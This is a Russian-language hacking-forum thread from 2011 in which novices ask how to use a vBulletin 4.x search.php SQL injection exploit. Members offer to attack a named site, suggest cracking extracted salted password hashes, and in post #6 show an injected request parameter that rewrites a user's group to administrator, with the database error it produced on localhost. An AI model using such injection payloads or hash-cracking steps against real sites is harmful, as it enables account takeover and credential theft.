HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.06.2011, 12:27
Smesh
Новичок
Регистрация: 28.05.2011
Сообщений: 0
С нами: 7873526

Репутация: 0
По умолчанию

Мне нужна помоч как уптреблят етот експлоит, кто нибудь помогите мне ,я новичок

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
 
Ответить с цитированием

  #2  
Старый 07.06.2011, 15:18
C-r-A-c-K
Новичок
Регистрация: 28.05.2011
Сообщений: 18
С нами: 7873526

Репутация: 1
По умолчанию

говори адрес сайта, помогу)
 
Ответить с цитированием

  #3  
Старый 08.06.2011, 01:37
ra0cg
Участник форума
Регистрация: 09.11.2008
Сообщений: 206
С нами: 9211661

Репутация: 539
По умолчанию

Цитата:
Сообщение от Smesh  
Мне нужна помоч как уптреблят етот експлоит, кто нибудь помогите мне ,я новичок
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
Как вариант, просмотри видео "как уптреблят етот експлоит", к примеру с YouTube.
 
Ответить с цитированием

  #4  
Старый 16.06.2011, 12:19
Sh0ck3R
Новичок
Регистрация: 03.05.2010
Сообщений: 0
С нами: 8433966

Репутация: 0
По умолчанию

В каком формате получается пароль?(чтобы расшифровать)
 
Ответить с цитированием

  #5  
Старый 16.06.2011, 12:37
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами: 9157119

Репутация: 74
По умолчанию

Скорей всего в формате соленого хеша.

На форуме есть тема, попробуй закинуть хеши туда, может, расшифруют.
 
Ответить с цитированием

  #6  
Старый 20.06.2011, 15:01
Export
Новичок
Регистрация: 13.02.2010
Сообщений: 0
С нами: 8547867

Репутация: 0
По умолчанию

Какие еще запросы можно сделать?

На все запросы вылазит ошибка

Код:
Database error in vBulletin 4.1.2:

Invalid SQL:
SELECT DISTINCT socialgroupcategory.title from socialgroupcategory AS
				socialgroupcategory WHERE socialgroupcategoryid IN (1) UPDATE `user` SET usergroupid = '2'  WHERE userid = '2';);

MySQL Error   : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UPDATE `user` SET usergroupid = '2'  WHERE userid = '2';)' at line 2
Error Number  : 1064
Request Date  : Monday, June 20th 2011 @ 03:57:50 PM
Error Date    : Monday, June 20th 2011 @ 03:57:50 PM
Script        : http://localhost/search.php?do=process
Referrer      : http://localhost/search.php
IP Address    : 127.0.0.1
Username      : 
Classname     : vB_Database
MySQL Version : 5.1.40-community
Запрос SQL такой

Код:
&cat[0]=1) UPDATE user SET usergroupid=6 WHERE userid=2#
В чем моя ошибка?

PS Через Execute batch file в Navicat'e запрос проходит.
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.